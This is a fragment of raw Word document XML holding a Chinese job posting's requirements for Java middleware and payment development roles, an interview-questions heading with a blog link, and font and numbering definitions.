          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>分布式缓存系统研发</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="00C079B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨境支付基础研发</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="00C079B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>任职要求：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>具有良好的计算机理论基础，熟悉常用数据结构和算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>熟悉</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java Lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>核心库如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>IO/NIO/Multiple Thread/XML/JNI/JMX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>熟悉常用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JSR</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>规范如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JAX-RS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>等以及相关实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>熟悉</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>或其它服务器框架、熟悉协议框架如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Protobuf</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Thrift</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>较好的代码调试分析能力、熟悉常见开源中间件的内部结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>具备一定的英文阅读能力和资料查找能力</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>具有一定编译器基础的优先</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>(Antlr</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>JavaCC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>有成熟中间件作品（包含服务器）的优先</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>扎实的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>自动化测试经验者优先</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556C95" w:rsidRPr="00F41A4C" w:rsidRDefault="00556C95" w:rsidP="00556C95">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面试题目集锦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00556C95" w:rsidRDefault="00C079B7" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F92975" w:rsidRPr="00F41A4C" w:rsidRDefault="00556C95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://my.oschina.net/ambitor/blog/522227?fromerr=3HZr59Wh</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F92975" w:rsidRPr="00F41A4C" w:rsidSect="00CC4BCA">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A54D7" w:rsidRDefault="00DA54D7" w:rsidP="00323904">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DA54D7" w:rsidRDefault="00DA54D7" w:rsidP="0032390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Verdana">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A10006FF" w:usb1="4000205B" w:usb2="00000010" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Helvetica">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="微软雅黑">
    <w:panose1 w:val="020B0503020204020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000287" w:usb1="280F3C52" w:usb2="00000016" w:usb3="00000000" w:csb0="0004001F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="microsoft yahei">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="MathJax_Main">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="MathJax_Math-italic">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="F7FFAFFF" w:usb1="E9DFFFFF" w:usb2="0000003F" w:usb3="00000000" w:csb0="003F01FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Menlo">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="simsun">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Segoe UI">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E10022FF" w:usb1="C000E47F" w:usb2="00000029" w:usb3="00000000" w:csb0="000001DF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="FangSong_GB2312">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="MS Gothic">
    <w:altName w:val="ＭＳ ゴシック"/>
    <w:panose1 w:val="020B0609070205080204"/>
    <w:charset w:val="80"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00002FF" w:usb1="6AC7FDFB" w:usb2="00000012" w:usb3="00000000" w:csb0="0002009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="sTHeiti">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Lucida Sans Unicode">
    <w:panose1 w:val="020B0602030504020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000AFF" w:usb1="0000396B" w:usb2="00000000" w:usb3="00000000" w:csb0="000000BF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Adobe 仿宋 Std R">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="080E0000" w:usb2="00000010" w:usb3="00000000" w:csb0="0004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A54D7" w:rsidRDefault="00DA54D7" w:rsidP="00323904">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DA54D7" w:rsidRDefault="00DA54D7" w:rsidP="00323904">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E125CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97285C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2FC31AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D88920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nsid w:val="037B2316"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="524C8E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038654B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E04432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04834C3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4BCD9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07CE29C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9274F5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08822594"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98C2D9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088D495E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A3EC1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089021DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B5CD6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08AB2B58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2660B2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09BC1A42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33521B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0A200E34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CC86D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0CFC48BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A90CB8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0DE36C19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0AA07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10577A31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6EEF7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12615913"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3DAAB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nsid w:val="16C826E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79F677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184F4FD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7452DA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1BE01317"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="134496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nsid w:val="1D2974B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F208E1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20C13BB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B0EFD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24C95A08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DB24D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nsid w:val="25A01235"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A884B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nsid w:val="28212AFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE2882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2939329D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF8E737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786" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%3、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2295" w:hanging="495"/>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2A7C213E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19C4C7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nsid w:val="2B366067"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41629D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nsid w:val="2E134291"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F670C8EC"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1197" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1617" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
